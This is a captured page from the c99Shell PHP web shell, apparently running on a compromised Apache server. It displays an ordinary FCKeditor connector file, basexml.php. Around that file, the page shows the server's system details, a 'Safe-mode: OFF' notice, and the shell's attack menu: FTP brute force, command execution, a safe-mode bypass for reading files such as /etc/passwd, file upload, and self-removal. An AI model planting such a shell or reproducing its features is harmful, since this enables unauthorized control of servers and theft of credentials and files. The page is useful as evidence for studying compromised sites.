!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/alumni/inc/fckeditor/editor/filemanager/connectors/php/   drwxr-xr-x
Free 53.74 GB of 127.8 GB (42.05%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     basexml.php (2.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * FCKeditor - The text editor for Internet - http://www.fckeditor.net
 * Copyright (C) 2003-2007 Frederico Caldeira Knabben
 *
 * == BEGIN LICENSE ==
 *
 * Licensed under the terms of any of the following licenses at your
 * choice:
 *
 *  - GNU General Public License Version 2 or later (the "GPL")
 *    http://www.gnu.org/licenses/gpl.html
 *
 *  - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
 *    http://www.gnu.org/licenses/lgpl.html
 *
 *  - Mozilla Public License Version 1.1 or later (the "MPL")
 *    http://www.mozilla.org/MPL/MPL-1.1.html
 *
 * == END LICENSE ==
 *
 * These functions define the base of the XML response sent by the PHP
 * connector.
 */

function SetXmlHeaders()
{
    
ob_end_clean() ;

    
// Prevent the browser from caching the result.
    // Date in the past
    
header('Expires: Mon, 26 Jul 1997 05:00:00 GMT') ;
    
// always modified
    
header('Last-Modified: ' gmdate('D, d M Y H:i:s') . ' GMT') ;
    
// HTTP/1.1
    
header('Cache-Control: no-store, no-cache, must-revalidate') ;
    
header('Cache-Control: post-check=0, pre-check=0'false) ;
    
// HTTP/1.0
    
header('Pragma: no-cache') ;

    
// Set the response format.
    
header'Content-Type: text/xml; charset=utf-8' ) ;
}

function 
CreateXmlHeader$command$resourceType$currentFolder )
{
    
SetXmlHeaders() ;

    
// Create the XML document header.
    
echo '<?xml version="1.0" encoding="utf-8" ?>' ;

    
// Create the main "Connector" node.
    
echo '<Connector command="' $command '" resourceType="' $resourceType '">' ;

    
// Add the current folder node.
    
echo '<CurrentFolder path="' ConvertToXmlAttribute$currentFolder ) . '" url="' ConvertToXmlAttributeGetUrlFromPath$resourceType$currentFolder$command ) ) . '" />' ;

    
$GLOBALS['HeaderSent'] = true ;
}

function 
CreateXmlFooter()
{
    echo 
'</Connector>' ;
}

function 
SendError$number$text )
{
    if ( isset( 
$GLOBALS['HeaderSent'] ) && $GLOBALS['HeaderSent'] )
    { 
        
SendErrorNode$number$text ) ;
        
CreateXmlFooter() ;
    }
    else
    {
        
SetXmlHeaders() ;

        
// Create the XML document header
        
echo '<?xml version="1.0" encoding="utf-8" ?>' ;

        echo 
'<Connector>' ;
        
        
SendErrorNode$number$text ) ;
        
        echo 
'</Connector>' ;
    }
    exit ;
}

function 
SendErrorNode(  $number$text )
{
    echo 
'<Error number="' $number '" text="' htmlspecialchars$text ) . '" />' ;
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.007 ]--